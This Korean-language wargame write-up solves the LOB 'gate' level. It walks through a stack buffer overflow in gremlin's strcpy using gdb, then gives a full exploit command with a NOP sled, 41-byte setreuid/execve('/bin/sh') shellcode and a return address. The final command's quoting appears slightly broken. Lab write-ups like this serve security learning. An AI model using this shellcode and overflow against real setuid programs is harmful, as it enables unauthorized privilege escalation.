LOB gate

LOB gate로 접속을 하면 

gate와 gate로 접속가능하다.

접속후 확인 하면 파일이 3개있는 것이 확인가능 하다 

먼저 cp 명령을 이용하여 gremlin의 권한이 없어 gdb 도 못하는 문제를 해결하자 !

cp명령어는 파일을 복사하는 명령어이다. 

파일을 복사하고 gremlin.c 를 열어보면 

strcpy에서 문제가 발생하는 것을 볼수 있다.

페이로드를 생각 해보면 일단 buffer 260(256+sfp)+shellcode+ret주소(buffer주소)를 넣어야한다.

gdb로 확인을 해보면 strcpy다음에서 일어나니 

b *main+59에 브레이크 포인트를 걸고 

r $(python -c 'print "\x90"*200(임의의 값)')을 넣고

x/100x $esp 로 esp값을 확인 하면 0x90909090시작하는 부분을 찾을 수있다

그곳에서 적당한 위치를 잡고 attack!!

q 를 이용해 gdb 에서 나온후 ./gremlin $(python -c 'print "\x90"*200+"\x31\xc0\xb0\x31\xcd\x80\x89\xc3\x89\xc1\x31\xc0\xb0\x46\xcd\x80\x31\xc0\x50\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x50\x53\x89\xe1\x31\xd2\xb0\x0b\xcd\x80(41byte shellcode)+"\x90"*19+"주소값"')=> 260+주소 값(200+41+19+주소값(4byte) 완성